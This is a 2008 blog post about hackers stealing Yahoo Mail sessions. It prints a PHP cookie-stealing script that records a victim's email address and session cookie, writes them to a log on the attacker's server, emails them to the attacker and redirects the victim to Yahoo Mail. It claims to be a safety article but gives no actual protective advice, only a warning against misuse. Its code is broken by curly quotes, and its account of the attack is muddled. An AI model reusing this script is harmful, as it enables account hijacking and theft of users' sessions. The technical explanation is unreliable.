Tuesday, March 4, 2008

Yahoo and hackers - One More War(installing virus in to ur pC

Posted by Vishnureddy at 8:21 PM

Share this Post and Be Awesome

What you think is the biggest challenge for hackers in this world? Definitely the answer is hacking world’s number one website, Yahoo.com.Yahoo is hacked so many times in last 5-6 years. Some hackers made yahoo infected with viruses in past. Means whenever you open yahoo.com it installs some viruses on your PC. So guess at what extent did yahoo has been hacked.
But with later new launches of yahoo’s beta versions, yahoo is more and more secured day by day.

Yahoo’s network security administrator works daily to keep yahoo cleaned.
What I mean is yahoo is all time target for hackers.
In last year yahoo detected a bug in its database which used to steal email addresses and password. Here is a small description of the bug and its features.

How hackers steal yahoo passwords

You might have noticed that some yahoo accounts accessed by an unknown person which used it to send promotional emails to list of friends of that accounts who, of course, accessed them leaving the hacker another open door, and another and so on, the chain never ends.
By this way in the geometric progression 1 account becomes 2, 2 then 4, 4 to 8, 8 to 16 and by this way chain goes on increasing giving the hackers millions of new email id’s to send exmails to. Hopefully yahoo wakes up.
I searched on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it’s easier to attack than to defend they say.
It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easily accessing the victim’s yahoo email.

The bug:

…which calls this php script:

if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookiethen the rest of the log
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);

header(”Location:http://mail.yahoo.com”); ?>…which writes the cookie to the hackers .log file that resides on his server.

A very simple example but so deadly. This was invented very much back but notes that old things are always used by hackers as weapon.
NOTE: The code is a little changed to make it hard to use without PHP knowledge.
Advice for being safe from this bug:
This article is meant to provide more information on how to protect your yahoo account and every account in general and should not be used for stealing someone’s info, password etc. Using this information for such purposes makes a crime and eventually you can be busted by yahoo security administrators. So think twice.


Love to hear what you think! Thanks Would make us Smile :)

Receive all updates via Facebook. Just Click the Like Button Below else Hit close icon


Search Entire Site

Custom Search
back to top